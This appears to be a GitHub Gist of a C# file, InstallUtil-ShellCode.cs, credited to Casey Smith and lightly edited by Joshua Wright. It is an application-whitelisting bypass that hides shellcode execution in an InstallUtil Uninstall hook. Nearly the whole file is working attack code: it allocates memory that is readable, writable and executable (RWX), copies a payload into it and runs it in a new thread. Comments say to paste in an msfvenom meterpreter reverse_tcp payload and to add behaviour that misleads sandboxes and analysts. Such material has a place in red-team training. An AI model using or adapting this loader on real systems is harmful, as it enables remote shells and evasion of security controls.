Created
April 15, 2024 13:04
-
-
Save joswr1ght/1c5ef0efa012cecd86e8cfd33f6178f8 to your computer and use it in GitHub Desktop.
InstallUtil-ShellCode.cs - Originally from subTee with Minor Comments Changes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Minor cleanup and clarity changes by Joshua Wright <[email protected]> @joswr1ght | |
*/ | |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
public class Program | |
{ | |
public static void Main() | |
{ | |
//Add any behaviour here to throw off sandbox execution/analysts :) | |
Console.WriteLine("Hello From Main...I Don't Do Anything.\n"); | |
} | |
} | |
[System.ComponentModel.RunInstaller(true)] | |
public class Sample : System.Configuration.Install.Installer | |
{ | |
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. | |
public override void Uninstall(System.Collections.IDictionary savedState) | |
{ | |
Shellcode.Exec(); | |
} | |
} | |
public class Shellcode | |
{ | |
public static void Exec() | |
{ | |
// Paste Metasploit payload below | |
// msfvenom --payload windows/meterpreter/reverse_tcp LHOST=10.10.75.1 -f csharp | |
// The payload will start with byte[] buf = new byte[... | |
// byte[] buf = new byte[XXX] { ... }; | |
// | |
// Leave everything else as-is | |
// | |
UInt32 funcAddr = VirtualAlloc(0, (UInt32)buf .Length, | |
MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
Marshal.Copy(buf , 0, (IntPtr)(funcAddr), buf .Length); | |
IntPtr hThread = IntPtr.Zero; | |
UInt32 threadId = 0; | |
IntPtr pinfo = IntPtr.Zero; | |
// execute native code | |
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); | |
WaitForSingleObject(hThread, 0xFFFFFFFF); | |
} | |
private static UInt32 MEM_COMMIT = 0x1000; | |
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; | |
[DllImport("kernel32")] | |
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, | |
UInt32 size, UInt32 flAllocationType, UInt32 flProtect); | |
[DllImport("kernel32")] | |
private static extern bool VirtualFree(IntPtr lpAddress, | |
UInt32 dwSize, UInt32 dwFreeType); | |
[DllImport("kernel32")] | |
private static extern IntPtr CreateThread( | |
UInt32 lpThreadAttributes, | |
UInt32 dwStackSize, | |
UInt32 lpStartAddress, | |
IntPtr param, | |
UInt32 dwCreationFlags, | |
ref UInt32 lpThreadId | |
); | |
[DllImport("kernel32")] | |
private static extern bool CloseHandle(IntPtr handle); | |
[DllImport("kernel32")] | |
private static extern UInt32 WaitForSingleObject( | |
IntPtr hHandle, | |
UInt32 dwMilliseconds | |
); | |
[DllImport("kernel32")] | |
private static extern IntPtr GetModuleHandle( | |
string moduleName | |
); | |
[DllImport("kernel32")] | |
private static extern UInt32 GetProcAddress( | |
IntPtr hModule, | |
string procName | |
); | |
[DllImport("kernel32")] | |
private static extern UInt32 LoadLibrary( | |
string lpFileName | |
); | |
[DllImport("kernel32")] | |
private static extern UInt32 GetLastError(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment